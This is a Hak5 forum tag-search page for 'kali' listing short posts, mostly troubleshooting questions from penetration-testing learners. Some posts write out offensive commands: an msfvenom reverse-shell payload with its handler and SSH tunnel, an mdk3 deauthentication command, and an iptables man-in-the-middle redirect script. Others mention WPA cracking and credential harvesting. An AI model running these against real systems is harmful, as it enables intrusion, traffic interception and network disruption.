Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'kali'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 39 results

  1. Hi!! I get this error when I try to run the record_mic command y meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What I'm doing wrong? Thanks!!!
  2. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 [email protected] -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you
  3. Best method to root android

    Hi guys & girls, what is the best way to root an android tablet? The tablet in question is a Asus Zen pad z300m. was wondering if Kali linux would run on this device? if not, what can I install on the tablet to learn wireless security. Can I also install nmap?
  4. All, The articles I read on here for getting Internet sharing working in Linux did not work for me on Kali Linux 2017.2 using WIFI as your internet connection. This will hopefully help those of you who run into the same problem I had. When using the wp6.sh script and hitting manual setup, it will actually remove your default route that is set in Kali. I'm not sure why it's doing this, despite specifying the default route during the wp6.sh manual setup steps. However, this is a simple fix. Go to the WIFI icon in the top right hand corner of Kali desktop and turn WIFI off. Turn WIFI back on and your default route should get re-added back to your route table. This should get internet sharing working with your Nano. Too lazy to specify the command line for this, you may even try restarting your network-manager service ($ service network-manager restart) but I havent tried this and dont want to :) Good luck! Hopefully this article helps someone.
  5. Unable to capture wpa handshakes

    To keep things short I've been experimenting with cracking wpa in aircrack. Everything works fine except a handshake is never captured as I am told when I go to run aircrack against the .cap file. I am using the panda PAU09 which plenty of people say works great, and yes the deauth command does work. I'm testing this in a home lab type set up so I know for sure the device reconnects to the AP, but for some reason I cannot capture the handshake. I am using the latest version of kali linux on the rpi, but have also tried on parrot sec os with the same issue I an following this guide ( https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ ) to the point, substituting my ap's mac. When I use airodump APs show up but connected clients do not. Please help
  6. I am having some trouble with the Alfa AWUS036NH. When connected to a raspberry pi 3 with kali 2017.1 it will not capture handshakes as well as not showing associated clients. The adapter can find APs but that is all. airmon-ng is showing the adapter running driver rt2800usb. I have tried "airmon-ng check kill" prior to monitor mode with no luck. Also have tried "apt-get install firmware-misc-nonfree" which is supposed to help with rt2800usb issues on a rt3070 chip. I have tried using the adapter on a full install kali x64 2017.1 machine install and all appears to be working plug and play. I have searched the raspberry pi, kali, and aircrack forums but have yet to find anything with a working solution. (most threads were dead before solution was posted) Any help with this issue is greatly appreciated!
  7. Kali Linux Revealed book is now online. So back in 2013, there was this thread about kali documentation and a PDF e-book to go along - Which still holds true today. The docs.kali.org site is still up, and will be updated as changes happen. However, some of you may have heard, or not, so I wanted to update everyone, if you want to learn Kali Linux (not penetration testing, but the OS itself) more in depth, from customizing your own kernel and ISO deployments, to pre-loading drivers needed for installation on work machines and your own compatible/incompatible hardware to work as needed, deploy your own repositories with tools not already on the Kali repo, create attack appliances like the Evil Kali AP, then you will probably want to check out the Kali Linux Revealed book. Now, this might sound really spammy. And if I was only promoting the book to have you buy it, I would agree with you(I debated on whether I would ever post this here, but I know a lot of the hak5 community uses it alongside their other Hak5 tools and Pineapples) - but, we have taken the book, and converted it to a website, that we have given away FREE to the community. That is to say, the entire book is in web form, for free, search-able text, and we offer a PDF version for download from our new child site. Check out https://kali.training/ if you weren't already aware of it. I worked on converting the book from the HTML draft to create the wordpress version of the site which is linked above. A lot of man hours went into creating not only the book, but the site, and also material that was recently showcased at BlackHat for those who took the Kali Revealed class. It's an introduction to Kali and Linux, and a good primer for anyone who also might be thinking about the OSCP. Again, this is NOT a pentesting book, but if you do use Kali for learning pentesting and CTF's, this will still be a valuable resource for everyone. As Kali evolves and the Kali Team makes changes to the OS, the site will also update to reflect this over time, with new volumes released on the site as well. The book is also a mini-primer for Linux in general, so if you want to learn Linux and were always afraid to make Kali your first distro, this would be a great place to go and get your feet wet (I know a lot of people have always said don't start with Kali - personally I think that doesn't hold true today with it's Debian roots and would recommend it to anyone - my kids and wife use it as the family living room desktop, so it works fine for every range of user, n00b to l33t haxor...cough..). I'll admit, having worked on the site and reading only parts of it in full while converting it from the book the site, I myself am still a n00b when it comes to a lot of things Linux related in general, and while I use Kali for "fun" with CTF's, I am by no means fluent with it. I still have to sit down and read it in full myself, but I'm familiar with the topics in it and know that I need to brush up on a lot of the fundamentals. Just a reminder, this is not a Penetration Testing book. It's a Kali Linux OS book for sysadmins and InfoSec folks who need to deploy for their own use, or need to use and get familiar with, but it also is a complete walk-through from setup for new users, to more technical admin side towards the end of the book for anyone already in the field with a lead in for assessments.
  8. Hi All, I know this has probably been mentioned on the internet countless times, but I can't seem to get my AWUS036NEH adapter working with Kali Rolling. I've been at this for days and just can't get my head around it. I'm running Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 GNU/Linux. I've trawled through forums here and other places and tried various set ups to get this working with no luck, so hopefully someone here can help me out. Issue: Getting AWUS036NEH adapter to work with Kali Rolling. I can get the device on the system, but I am unable to scan APS (airodump wlan0mon). Although, after trying numerous times to get the adapter working, and keep a log of each step, airodump did work randomly once. (The steps I did will be displayed below) Setup: Kali is running on Virtualbox VM 5.1.24 Tested the following: Plugged in adapter, selected the USB device to be recognized by Virtual BOX and ran lsusb and can see the device. Please see below for what I did and got it working, but does not work anymore when I try again. This tells me, that the adapter intermittently works, but am I not understanding or missing something to get it working consistently? I have each time ran airmon-ng check kill, on each attempt to get it working. (I've set up the adapter on my MAC OS and it works perfectly fine) But as mentioned, I can't get it to work anymore, can anyone put me in the right direction or help me out? Thanks
  9. I installed Wifite and every time I run it, I see the following. What is wrong? [+] scanning for wireless devices... Traceback (most recent call last): File "/usr/bin/wifite", line 3462, in <module> engine.Start() File "/usr/bin/wifite", line 1313, in Start self.RUN_CONFIG.THIS_MAC = get_mac_address(iface) # Store current MAC address File "/usr/bin/wifite", line 1864, in get_mac_address proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN) File "/usr/lib/python2.7/subprocess.py", line 390, in __init__ errread, errwrite) File "/usr/lib/python2.7/subprocess.py", line 1024, in _execute_child raise child_exception OSError: [Errno 2] No such file or directory
  10. hello ive recently read a lot about anonsurf and was wondering if turning a vpn on before turning on anonsurf would ghost my activity? If not I would love to hear your thoughts about the best way to become ghost online.
  11. Hi, so i louched an mdk3 after having created the blacklist file with echo and of course having placed the wlan0 in monitor mode (wlan0mon). However there is no output after: mdk3 wlan0mon d -b blacklist -c 1 I have to cancel eventually with control + c. Can somebody help? Thanks P.S using ALFA wireless card and injection works fine, tested with aireplay, also airodump, reaver etc. just MDK3 gives me issues.
  12. Hey, I'm signed up for the 30 day OSCP course to start in about a month and have a few questions, I understand everyone is supposed to keep quiet about the exam so if this is breaking the rules please let me know. So in the exam I've heard you have 5 machines on the network you have to get root on, are they all in the same IP range for example 192.168.0.1 -> 192.168.0.255 or is it more complicated than that? I'm guessing at the start they won't tell you what the IP addresses are as well? Also are there more machines on the network you aren't supposed to target to make things trickier? I managed to get all the way through the Kioptrix 1.1 machine (walkthrough in the link is the way I did it) past the command injection part without a problem but then the rest I managed to do with a bit of difficulty. For the sake of my sanity I was wondering how difficult are the machines in the lab compared to this, disregarding the four or so scary ones I've heard about? The one issue I'm having with the Kioptrix labs and metasploitable, which is making me feel a hell of a lot like a script kiddie is always searching searchsploit and google to find vulnerabilities and not being able to write them myself, I hear people saying a lot about in the OSCP you need to modify scripts but so far all I have had to do is download/find scripts, compile them or make them executable. Are there any other ways I'm supposed to modify scripts for the labs/exam and will I need to write my own scripts for exploitation or just for enumeration? In a review of the course I read online someone mentioned the first two stages of a pentest should almost always be enumeration/ports etc, then finding services running etc, so far I assume these two are the same thing and I'm worried i'm missing something out, surely something like nmap -A or -sV would enumerate and find services right? As I'm taking the 30 day i'm quite paranoid to get all of the basics covered as I possibly can before the time starts, I'm comfortable with the following: nmap, command line, bash, python, perl, c, assembly, metasploit, decent understanding of a lot of the network protocols, wireshark, nc, dns zone transfers, SQL injections, basic javascript in XSS Is there anything else I should look into before to give myself the best chance to do it in 30 days? Thanks for spending the time to read, I hope this doesn't come under yet another OSCP thread
  13. Parrot vs Kali

    Does anyone have experience with Parrot OS? I've used Kali/Backtrack plenty over the years, but I've recently been exploring other options. Parrot looks good. I've read some articles, and they seem biased based on who wrote it.
  14. Hi everyone. I recently picked up a new Pi 3, and I set it up to run headless with CC through SSH. I'm having difficulty getting packet injection to work for some reason. I know the Alfa cards work, I can use them successfully on my other devices just fine. 0/30 tests failed with aireplay-ng injection testing on the Pi for some reason. Kali 2.0 works fine on my laptop and PC. Anyone else have this issue before? I can pick up APs just fine, I've tried turning off channel hopping, specifically defining an ssid. No joy. Any ideas would be greatly appreciated!
  15. I have a question about using the sidejacking tools built into kali linux like hamster and ferret in conjunction with the wifi pineapple. This came about because i was using the pineapple module "Dwall" and seeing the cookies pass by. So if i fire up ferret and hamster on my kali machine to pick up the cookies that dwall picks up what is the best interface to use to achieve this? Do i use eth1 with i am using to connect my pineapple to my computer or maybe wlan0 which is my interface connected to the internet? I also have an eth0 interface because i have also have another ethernet cable from pineapple to computer (not really needed just didn't want to lose the cable lol) As you can see i have a few interfaces and i was wondering which one i should use. Hope someone can clear this up for me, thanks
  16. Good day, After a severe months of buying my first pineapple back from the version lower that 1.0 if i recall. This week i was trying some tests with the modules updates. After several hours my pineapple started to work weird so i did a reset to factory but the issue persist. Now in a Kali box the adapter tends to turn off after a click in the web interface.. The modules i was testing was the Occupineapple, Dwall y Evil portal. I don't know if i just damaged the pineapple or was imminent because of the testing batch. Any advice or suggestion? Sorry for my english.
  17. Heya! I'm trying to clone a site via Credential harvester attack method provided by SETkit but I receive the following error: Link: https://ibb.co/hFJuy5 When I proceed to disable apache by ''y'' I receive the error: Link: https://ibb.co/nFXnJ5 Workarounds that I already tried: Reboot apache2ctl start|stop etc Reinstalling apache2 Reinstalling kali Trying on a non HTTPS site apt-get update & updgrade I'm running Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.25-1kali1 (2017-05-04) x86_64 GNU/Linux on a Oracle VM Virtual Box and yes I'm attempting it on LAN and for EDUCATIONAL purpose only. P.S: Recommend me some site with active members willing to help newbies like me so that I might be able to get help from there as well in the upcoming future. Peace.
  18. Kali nethunter

    Hi, I have a nexus 5 and I've installed Kali nethunter on there with no problems but I've tried to run commands such as apt-get update, apt-get install ect.. but it always says err 404 and the E: failed to fetch some archives maybe run apt-get update or try with --fix-missing? Can anyone please help explain how I can fix this, thanks
  19. Metapsloit exploits

    Hi all i'm currently undertaking a project that involves exploiting a metapsloitable 2 machine and a windows XP machine running SP3, however the findings that i have found are that there are limited resources available when using metapsloit as there seems to be many step by step guides of how to complete an exploit but not enough information regarding troubleshooting. Do you think it would be beneficial to learning to explain more about each step of an exploit in terms of what each command does and if an exploit fails for there to be more information available about why it fails and workarounds for how to solve such problems. For instance when trying to exploit Windows XP with the popular ms08_067_netapi exploit the results for my conducted test just returned "Exploit Completed, but no session was created" Any feedback regarding this would be most welcome. Thanks.
  20. Vulnerability scanning tools

    Hi all, i'm undertaking a project to determine which vulnerability scanning tools within Kali Linux are best suited for the job, there were three tools tested and these were, Nikto, Sparta and OpenVAS. The results that these scans returned when scanning metasploitable 2 with a Kali linux machine are as follows: Metasploitable 2 Nikto 15 Sparta 46 OpenVAS 144 These results are solely the number of vulnerabilities that were returned, OpenVAS seems to be the right choice but im looking for feedback to back up these results of whether this is accurate? or maybe whether the other tools have features that may give them an advantage over the other. Any feedback would be most welcome. Thanks.
  21. Pen testing tools

    Hi all, im undergoing a project to determine which penetration testing tools are better suited for information gathering when using Kali to attack a Metapsloitable 2 machine and a Windows XP SP3 machine. All of this research and testing is focusing on users with limited knowledge who may be just starting out in terms of testing tools. The three tools that were chosen to compare were Nmap, Unicornscan and Dmitry and the returned results were as follows: Metasploitable 2 Windows XP Nmap 23 3 Dmitry 8 2 Unicornscan 20 3 The results above showed the open ports that were found by scanning the IP address of the target machine as well as services that are running and also the version. So in my mind Nmap looks to be the better option but with the limited knowledge that i have would i be wrong to say Nmap is the better tool for the job or do the others offer other benefits which i am not seeing? Any feedback would be most welcome.
  22. Hi everyone, I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup, MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine : Pardon my diagram skills :( Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal since you would need to ssh into the pineapple to run this script every time. Ideally it would be best to do this via the web interface of the pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated. #!/bin/bash if [[ $# -eq 0 ]] ; then echo "Usage: $0 (enable|disable)" exit 1 fi action="$1" case $action in enable) echo "Enabling ..." iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080 #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083 iptables -t nat -A POSTROUTING -j MASQUERADE ;; disable) echo "Disabling ..." iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080 #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083 ;; *) echo "Usage: $0 (enable|disable)" exit 1 ;; esac
  23. Kali Linux/nCrack. Basic Error

    Hey guys, new to linux, getting this error when using ncrack, pretty sure it's going to be something really basic "Service with name 'password.txt' not supported! Ignoring..." This file is just a simple .txt file, it also has no issues with using username.txt as shown in the image. Any help would be predicated. Thanks!
  24. I'm using probeSniffer to log probe requests. I'm on Kali 2.0 using an Alfa AWUSO36NH wireless adapter in monitor mode. Everything works, but about an hour in, the process is "Killed." And it stops logging probe requests. My goal is to run this for several days, non-stop. Is the adapter going into a power management induced sleep? And how would I achieve fixing that so I can collect my data? https://github.com/xdavidhu/probeSniffer Cheers
  25. No sound on kali

    I was going to watch hak5 on youtube but then i notice that there were no sound drivers at all. Im on a laptop that only have kali on it. Since it is a fresh install i thougt this was wierd. Anyone that have ancounterd the same problem and can help? Btw im new to hacking and all the videos you guys have on hak5 are so many so anyone have a recomendation on were to start for a noob?
×